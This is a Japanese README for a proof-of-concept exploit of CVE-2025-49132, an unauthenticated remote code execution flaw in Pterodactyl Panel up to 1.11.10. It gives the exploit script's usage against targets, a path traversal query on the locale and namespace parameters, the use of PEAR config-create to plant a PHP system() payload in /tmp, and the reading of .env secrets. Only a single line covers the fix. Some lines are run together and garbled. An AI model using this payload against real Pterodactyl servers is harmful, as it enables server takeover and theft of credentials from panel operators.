
CVE-2025-49132 (GHSA-24wv-6c99-f843) の PoC エクスプロイト – Pterodactyl Panel ≤ 1.11.10 における認証不要のリモートコード実行
Pterodactyl Panel - 認証不要のリモートコード実行 (RCE)
CVE‑2025‑49132 は、Pterodactyl Panel <= 1.11.10 に影響を与える深刻なリモートコード実行の脆弱性です。
認証されていない攻撃者は、/locales/locale.json エンドポイントにおける不適切な入力検証を悪用し、任意のシステムコマンドを実行できます。
修正バージョン: 1.11.11
悪用に成功すると以下が可能になります:
.env)の読み取り深刻度: Critical
この脆弱性は、以下のパラメータの不適切な検証に起因します:
locale パラメータnamespace パラメータ攻撃者は以下が可能です:
../../../../../)の悪用config-create の活用/tmp に書き込む脆弱性分類: CWE-94 -- コード生成の不適切な制御
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
デフォルトパス:
/usr/share/php/PEAR
適切なパスを /phpinfo.php ページから取得

攻撃者は以下を使用して、悪意のあるPHPペイロードを /tmp/payload.php に注入します:
/<?=system('id')?>+/tmp/payload.php
以下の呼び出しにより:
?locale=../../../../../tmp&namespace=payload
サーバーは注入されたPHPを実行します。

locale および namespace 入力をサニタイズ